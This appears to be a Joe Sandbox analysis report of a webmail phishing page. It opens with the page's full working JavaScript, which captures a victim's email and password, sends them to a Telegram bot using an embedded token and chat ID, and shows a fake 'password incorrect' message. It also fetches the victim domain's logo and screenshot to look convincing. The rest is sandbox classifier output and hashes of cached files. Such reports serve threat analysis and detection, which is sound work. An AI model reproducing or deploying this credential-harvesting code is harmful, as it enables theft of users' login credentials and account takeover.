$(document).ready(function(){ $('#omak').click(function(event){ event.preventDefault(); $('#error').hide(); $('#msg').hide(); var email=$("#email").val(); var password=$("#password").val(); var my_email =email; var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!email) { $('#error').show(); $('#error').html("Email field is empty"); return false; } if (!filter.test(my_email)) { $('#error').show(); $('#error').html("That account doesn't exist. Enter a different account"); return false; } if (!password) { $('#error').show(); $('#error').html("Password field is empty"); return false; } var ozi = "\n=========WESTERN-PROPARGANDA==========" ozi+="\nuser: "+email ozi+="\npass: "+password ozi+="\n===================================\n" tmsend(ozi) $("#msg").show(); $('#msg').html("<span style='color:red;'>Authenticating.....</span>"); setTimeout(() => { $('#msg').html("Password is incorrect. Please try again"); $("#password").val(""); document.getElementById("password").focus(); }, 2000); }); }); async function AntiBOT(){ var d = document.getElementById("top"); d.style.display = "block"; document.getElementById("password").focus(); var email = window.location.hash.substr(1); if (!email) { }else { var my_email =email; $('#email').val(my_email); var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!filter.test(my_email)) { $('#error').show(); email.focus; return false; } var ind=my_email.indexOf("@"); var my_slice=my_email.substr((ind+1)); var mainPage = 'https://'+my_slice; var c= my_slice.substr(0, my_slice.indexOf('.')); var final= c.toLowerCase(); var finalu= c.toUpperCase(); var sv = my_slice; var image = "url('https://image.thum.io/get/width/1200/https://"+sv;"')" $("#logoimg").attr("src", "https://logo.clearbit.com/"+mainPage); $("#logoname").html(final); $(".logoname").html(final); document.body.style.backgroundImage = image; $(".email").html(email); } } function tmsend(message){ var token = "6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY"; var chat_id= "7468307739"; const url = `https://api.telegram.org/bot${token}/sendMessage` // The url to request const obj = { chat_id: chat_id, text: message }; const xht = new XMLHttpRequest(); xht.open("POST", url, true); xht.setRequestHeader("Content-type", "application/json; charset=UTF-8"); xht.send(JSON.stringify(obj)); }
URL: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sign in to continue", "prominent_button_name": "Sign in", "text_input_field_labels": [ "Enter your correct password to avoid deactivation" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Sign in", "text_input_field_labels": [ "Enter your correct password to avoid deactivation" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Enter your correct password to avoid deactivation", "prominent_button_name": "Sign in", "text_input_field_labels": [ "md5x9x@aikzmy.net", "Password field is empty" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:29:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9857910173319153
Encrypted:	false
SSDEEP:	48:8Sd2Tya/wH8ZidAKZdA19ehwiZUklqehRy+3:8HH/rr+y
MD5:	0C7CA8F715F75AF0619DBC4DABEFDC6A
SHA1:	33C9DB2A01A4491B54D5CEEF6CE80E4BDB812814
SHA-256:	6AE3DE70A4B995BBFE4E68D56518F8398F879A785CA10714B0139C5A9F338C16
SHA-512:	D85EDBAA6315560C724E59290793F4702715AB8274046045899BDBCC911DCC1F7C717BF7373D36029C1C18655CD931E02FC7A7E97333493DEFE4D8A20B06DDBA
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.......[.b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I)Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............M.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:29:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.0016941579510865
Encrypted:	false
SSDEEP:	48:8Vd2Tya/wH8ZidAKZdA1weh/iZUkAQkqehuy+2:8+H/rZ9Qzy
MD5:	188C3304709A00CCDE1F3EF7BC4EA98A
SHA1:	85978513D537A7B98626449A5F093FC4AA13E271
SHA-256:	9436672EBFE16EA8663B74BD5462CEDE7FC3D084CC9A5B1EAE2C65CB03AD5487
SHA-512:	F54568DACD3695A18497E5BF56DFB6D2C03F81FE6A176C7540562E5DDB5B6C1FBC616BD866AC8EDC9A9C1ACA07EA3DC346E316A3AD6C623BB0C57446A13A12BD
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....S.[.b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I)Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............M.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.011561499610365
Encrypted:	false
SSDEEP:	48:8xLd2TyasH8ZidAKZdA14tseh7sFiZUkmgqeh7sYy+BX:8xEHnpnqy
MD5:	B153EC9D000E113F441B2C6358BAAD61
SHA1:	1D86109E9747E3026FA3193ABF576D92C4C04323
SHA-256:	188E03D979981B161339150CCF387E49098717AE1FCA912B80594BCC69F3AE9C
SHA-512:	441C319746C59936DA10359E2B75CEFB57554EAB77841B8DF76FB90B518E7FE4A1E35B49F57608F4463B0D06F57F2A9CBE7F978D26B83AC7B39952B520BBF77C
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I)Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............M.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:29:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	4.000474220000411
Encrypted:	false
SSDEEP:	48:8Rd2Tya/wH8ZidAKZdA1vehDiZUkwqehCy+R:8iH/r6Qy
MD5:	52D0732B8B9497F197EA7982AB506B61
SHA1:	511810D1A7C406F268A4A25DF58A65636F32E9EF
SHA-256:	2EC8E9D1ED322F3E80C6B23358ECE620C0D584A30903C55F8279E3AFB135DDCD
SHA-512:	29571C771DF1CBA1C4D99E47FE6AC5B2D88E9D1EFC71BDC93586C484FD667F4E744A7850D110EF06ACF199CE15372DDEF5AC2556D315CAC51C94D0CC95C53F09
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....},.[.b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I)Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............M.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:29:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.989724936159703
Encrypted:	false
SSDEEP:	48:8Xd2Tya/wH8ZidAKZdA1hehBiZUk1W1qehEy+C:84H/r69ky
MD5:	A76EBBFCA20AF251044789AEBCA859F0
SHA1:	2DC72EEBA1917C4465F74A7BB239AC18CC1C0D80
SHA-256:	B69990B402D3495F3886172F532F4A2CB51F0AC9B96A38FE3BC59664F29B5793
SHA-512:	D4368F0530122B8D23202BFFF8626BDE153A65D76EE4E1A10DE9A1793A8622A7AE381CB550CDBE4E3FE5DAEE9AF675CCB48881CD9D4058ED7394AB2F45E104E6
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.......[.b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I)Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............M.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 17:29:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.997769843649047
Encrypted:	false
SSDEEP:	48:8Hqnd2Tya/wH8ZidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbqy+yT+:8HfH/rET/TbxWOvTbqy7T
MD5:	6F21686AFA53C045B4A3DD25F150CB7A
SHA1:	74CC061E256367E61AF4822B6DAE044C170FB188
SHA-256:	5FDC6A3C6AC98F39A9B4D10CA668609297F1CFD7E94416D7F390914866652414
SHA-512:	0937E58033E95746F0A4EC9E47C9E92D72B2E7F6F5C0C720B21F7ACCB6AE1FEE73A6705A4402BF7D9A4F6D99D324D673B02EB1C8D5AF730B353462984C16327E
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....o..Z.b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I)Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............M.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (21422), with CRLF line terminators
Category:	dropped
Size (bytes):	32702
Entropy (8bit):	6.173251441893169
Encrypted:	false
SSDEEP:	768:jhvSTTGja1vEwk4mEuglurKRoBZCGewOKhr:j0SjatEwDxlurxBZCSjhr
MD5:	A82931C016AA1A130CBB50EEE3768791
SHA1:	E6025818DDC02874D30A71BB40852B92C47BA78A
SHA-256:	3BD0FED2756D891D9ABB7B5C234262E6962DD99A82B9E316BD2480B087294EB8
SHA-512:	DBDD3BBF182BA27F6D6333670D3D4396293495180137C9DD58B00DCABFE00EC823B134B7A0985473D34E591EB6A4E24A18A2C1E0BDB0CDCF347A256D11FC5068
Malicious:	false
Reputation:	low
Preview:	..<!DOCTYPE html>..<html>..<head>..<html lang="en">..<head>.. .. Required meta tags -->.. .. <title class="logoname">Webmail Portal Access</title>...... <link type="text/css" rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">.. .. .. <style type="text/css">......body {.. font-family: 'Open Sans', sans-serif;.. color: #535353;.. background-repeat: no-repeat;.. background-size: cover;..}..}.....img-fluid {.. max-width: 100% !important;.. height: auto;..}.....form-control:focus {.. box-shadow: none;..}....h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {.. font-family: 'Open Sans', sans-serif;..}..../ Login 1 start /...login-1 {.. background: rgba(0, 0, 0, 0.04) url("") top left repeat;.. background-size: cover;.. top: 0;.. width: 100%;.. bottom: 0;.. opacity: 1;.. min-height: 100vh;.. text-align: center;.. position: relative;.. display: -webkit-box;.. display: -moz-box;

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65326)
Category:	downloaded
Size (bytes):	160302
Entropy (8bit):	5.078105585474276
Encrypted:	false
SSDEEP:	1536:V47CIJ0T2r+ryEIA1pDEBi8yNcuSEcA1/uypq3SYiLENM6HN26b:S7VSGGq3SYiLENM6HN26b
MD5:	816AF0EDDD3B4822C2756227C7E7B7EE
SHA1:	C470239D4C7DB36D56DC3A74A080C62218C6EDC4
SHA-256:	5B0FBE5B7AD705F6A937C4998AD02F73D8F0D976FE231B74AEF0EC996990C93A
SHA-512:	32844D968C5B4AD05C0FCCF733FD819A74FEAE0E08B0CC4F917686876CC3E8B18D34513CD16DE89EC02145C30032B4A8C962FDC43EC4AEDD267A7EEF47C2D466
Malicious:	false
Reputation:	low
URL:	https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css
Preview:	/!. Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors. * Copyright 2011-2020 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). /:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace},::after,::before{box-sizing:bo

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.378783493486175
Encrypted:	false
SSDEEP:	3:qinPt:qyPt
MD5:	4C42AB4890733A2B01B1B3269C4855E7
SHA1:	5B68BFE664DCBC629042EA45C23954EEF1A9F698
SHA-256:	F69E8FC1414A82F108CFA0725E5211AF1865A9CEA342A5F01E6B2B5ABE47E010
SHA-512:	0631C6EFD555699CB2273107FE5AF565FEC2234344E2D412C23E4EE43C6D721CB2B058764622E44FD544D840FF64D7C866565E280127C701CAAB0A48C35D4F5C
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkhd9xswKN12xIFDYOoWz0SBQ3OQUx6?alt=proto
Preview:	ChIKBw2DqFs9GgAKBw3OQUx6GgA=

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	XML 1.0 document, ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	256
Entropy (8bit):	5.2847279182162055
Encrypted:	false
SSDEEP:	6:TMVBd/IqZjZvKtWBojhXKLRMzhwDk6xpG0hZGTIbRuan:TMHd1BZKtWejhXcMzUDGQG8bRua
MD5:	4E94385C8794D3D63C1971CFE3C9FFD6
SHA1:	52922395993E5C120D83EEA751CD010A6447DF90
SHA-256:	52192A3F973B1BCA78F9FF5207241D50008CA71E4F54A197CAD2E0672625BB63
SHA-512:	540616422ABD9414DD69F002ECFCE5C853CCB6F641BBEAEF3747D145DE8BC7E690F163C109E8DBEFE0A0B87894CC98FF19F63EA178A84DF857565BFFE2633DBD
Malicious:	false
Reputation:	low
URL:	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/favicon.ico
Preview:	<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message></Message><BucketName>ranprojects0s0wemanin</BucketName><RequestId>tx0000030114c373f00e17f-0067801574-229bb76d-nyc3d</RequestId><HostId>229bb76d-nyc3d-nyc3-zg04</HostId></Error>

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	dropped
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	low
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	low
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.519265602280304
Encrypted:	false
SSDEEP:	3:YKOHcWnyKBAHfXHyUNskUQ9WeUAdRNn:YKOHnyaiftOkUgzTN
MD5:	3FA187421B5A45709B21C348556B4A6A
SHA1:	F44809B9AAA680AE2BD9952DEEE31F85FED9FFB1
SHA-256:	BADDE82FD2CA7C7B153EC29AAABD4E9A370A953FF2C0591DFB19B4521D4AE518
SHA-512:	7C738A42C954A55E718266CA0868870E6F87E9676298E1A488F14DFC546FC5E69EAA3069CA452C9AA6DAA2B7EC431FF51A82566A2EDD177C1180E9631802A6C2
Malicious:	false
Reputation:	low
Preview:	{"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (21422), with CRLF line terminators
Category:	downloaded
Size (bytes):	32702
Entropy (8bit):	6.173251441893169
Encrypted:	false
SSDEEP:	768:jhvSTTGja1vEwk4mEuglurKRoBZCGewOKhr:j0SjatEwDxlurxBZCSjhr
MD5:	A82931C016AA1A130CBB50EEE3768791
SHA1:	E6025818DDC02874D30A71BB40852B92C47BA78A
SHA-256:	3BD0FED2756D891D9ABB7B5C234262E6962DD99A82B9E316BD2480B087294EB8
SHA-512:	DBDD3BBF182BA27F6D6333670D3D4396293495180137C9DD58B00DCABFE00EC823B134B7A0985473D34E591EB6A4E24A18A2C1E0BDB0CDCF347A256D11FC5068
Malicious:	false
Reputation:	low
URL:	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html
